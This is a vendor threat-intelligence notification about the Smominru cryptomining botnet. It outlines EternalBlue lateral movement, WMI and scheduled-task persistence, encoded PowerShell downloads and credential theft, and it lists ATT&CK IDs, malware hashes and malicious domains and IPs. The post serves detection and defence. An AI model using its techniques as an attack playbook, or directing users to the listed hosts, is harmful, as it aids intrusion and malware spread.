Carbon Black’s Threat Analysis Unit (TAU) and CB ThreatSight discovered the resurgence of a previously active crypytomining botnet campaign called Smominru. This campaign has evolved since its original discovery in the latter half of 2017, leveraging new techniques including LOLbins, polymorphic malware, repackaged/modified malware, open-source exploits, credential theft, and data exfiltration. The botnet consists of global victims but primarily targets Asia and Europe. The campaign primarily utilizes Eternal Blue scanning for lateral movement. Though complex in nature, the vast majority of the commands used by the campaign are either base64 encoded or in plain text.
(Carbon Black’s full report on this campaign may be downloaded here.)
Behavioral Summary
The behaviors detected associated with this botnet are very noisy in nature. Cb Defense will generate multiple alerts with a multitude of TTP’s. Alerts will range in priority, but typically will range from 5 to 8 depending on the degree of overlap between the malware and associated behaviors.
Exhibit A: Noisy Malware Alert with Associated TTP’s
Details
Multiple child processes will be dropped and/or invoked from the first stage malware. Extensions include but are not limited to .exe, .rar, .ps1, .vbs, .bat, .py, .sct, .jpg, and .txt files. PowerShell is the primary vector exploited for downloading hardcoded secondary and tertiary payloads onto victim machines.
The observed persistence mechanisms include the following:
- Windows Management Instrumentation (WMI) to invoke PowerShell with base64 encoded commands to download additional malicious code
- WMI event filter subscriptions to trigger malicious code execution
- Scheduled task creation (and deletion)
- DNS poisoning
- Firewall tampering
Exhibit B: Smominru Behavioral Spider Graph
If you are a Carbon Black customer looking to learn how CB solutions help defend against this attack, click here.
Indicators of Compromise (IOCs)
MITRE ATT&CK TIDs
| TID | Tactic | Description |
|---|---|---|
| T1064 | Defense Evasion, Execution | Scripting |
| T1496 | Impact | Resource Hijacking |
| T1041 | Exfiltration | Exfiltration Over Command and Control Channel |
| T1043 | Command And Control | Commonly used port |
| T1497 | Defense Evasion, Discovery | Virtualization, Sandbox Evasion |
| T1040 | Credential Access, Discovery | Network Sniffing |
| T1003 | Credential Access | Credential Dumping |
| T1047 | Execution | Windows Management Instrumentation (WMI) |
| T1027 | Defense Evasion | Obfuscated Files or Information |
| T1035 | Execution | Service Execution |
| T1112 | Defense Evasion | Modify Registry |
| T1053 | Scheduled task | persistence |
| T1222 | Defense Evasion | File Permissions Modification |
| T1117 | Regsvr32 | Regsvr32.exe loads COM scriptlets to execute DLLs |
| T1107 | Defense Evasion | File Deletion |
| T1177 | Execution, Persistence | LSASS Driver |
| T1084 | Persistence | Windows Management Instrumentation Event Subscription |
| T1059 | Command-line interface | Cmd execution |
| T1050 | Persistence, Privilege Escalation | New Service |
| T1132 | Data encoding | PowerShell base64 encoded commands |
| T1031 | Persistence | Modifying Existing Service |
| T1086 | Execution | PowerShell |
Endpoint Indicators
| Process(es) | SHA-256 Hash(es) | Context |
|---|---|---|
| Csrs.exe | 4958c38ba2d7def9ba44c5382f2c5a41c619d5a5eedfb8ac4697dbf75c306933 | Python compiled Eternal Blue executable |
| U.exe | 46bc86cff88521671e70edbbadbc17590305c8f91169f777635e8f529ac21044 | First or second stage malware |
| upsupx.exe | 790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd | First stage cryptominer |
| item.dat | ae161e582de9ec380b3e0b295effd62eb8889ac35bc6631a9492cf41563ed14a | Supporting file |
| msinfo.exe | 7ec433dd0454553b09f11c39944e251e3ee32e4981f52f02adc3011eb0ce6537 | Invokes clean-up scripts |
| anydesk.exe | 2038dfd46f837540cd417cd09e48478b1a72f913f6c6e0797dceda93ffb1dc4a | Eternal Blue scanner |
| 64.exe/lsmosee.exe/max.exe/ok.exe | fea935d2d0fb1abadb900f009b4c40bb8a91fd9e25cc76ed4f9dae08960566d5 | VM detection, DNS poisoning, modified cacls (various) |
| sqlservr.exe | 5e86200a75b2e5878f521d02bfbdef59d4d2421a5f2425482e0e07fba5d3a749 | XMR miner |
| msief.exe | 4755feca6fc53283a6a4a2b2dc8a5885470ce9465c5f827400b498d5f433bea8, 2ee3cefa345dc5b6e1e459d4a3bb8bb9dd0de0d54b28392bc117448d20e4de5e, e00b60e17f6788b7e3ac0e6db5d9abc32938018f1caec4069af4c252c52becd2 | 2nd stage malware |
| n.vbs | 4e886a70b4c097bbd0feab3b2a1dbaa8e1a305f2d1c9b1745f7e9b6b5c8392c9, 8250fe8f8ba817301fb439e9c40e660425e647898ddfa92859b32cada024b2b2 | invoked script |
| c3.bat | 18025e55b789a161401b7c0ce8f14a45cf50a44d70633db7b4e78b44ab7ec476, 51d975005204f78a93a37ef2ecd6b64706f6274043e658407d590ee52d8b87a7, 0a8b929cfab2dfdf3b5340949425db7a90e0fa53dcdd3da72afce8ebdda89efb, 132df91bb042f91aedc3a18ce3ed2a09fa4e0f46309e6b6fd956e23fad6a04a3 | clean-up script |
| Mscorsvwx.exe | 9e1bf70e006000b3005e04f52be024a5b695e016e9c90c529d10c66ebc851d13 | Scrapes lsass.exe |
| cpnyprroi.exe (polymorphic) | cc396d1e22e94a7a20fe9a4da31c89d4930b8d2f01a7e79241c5b10b9c2159ad | Polymorphic malware |
| lsmm.exe | 8246293a368a1da86aba696bea93460705ca4c40aa4c75dde909b8d9dff5efcb | modified Xmrig.exe miner |
| Known System DNS or IP | Context |
|---|---|
| wmi.1217bye.host | Server: Microsoft-IIS/7.5 |
| 213.183.60.7 | No longer accessible |
| 173.208.139.170 | Server: Microsoft-IIS/7.5 |
| 35.182.171.137 | No longer accessible |
| 223.25.247.240 | Server: Microsoft-IIS/7.5 |
| 174.128.248.10 | No longer accessible |
| garrafa8.itaucredicard.tk | Server: nginx |
| 2019.ip138.com | Microsoft-IIS/6.0 |
| pc.pc0416.xyz | Server: Microsoft-IIS/7.5 |
| 103.213.246.23 | hosted malware files |
| 173.247.239.186 | hosted malware files |
| 185.112.156.92 | hosted malware files |
| 198.148.90.34 | hosted malware files |
| 208.51.63.150 | hosted malware files |
| 223.25.247.240 | hosted malware files |
| 45.58.135.106 | hosted malware files |
The post CB TAU Threat Intelligence Notification: Smominru Botnet Leverages New Attack Techniques appeared first on Carbon Black.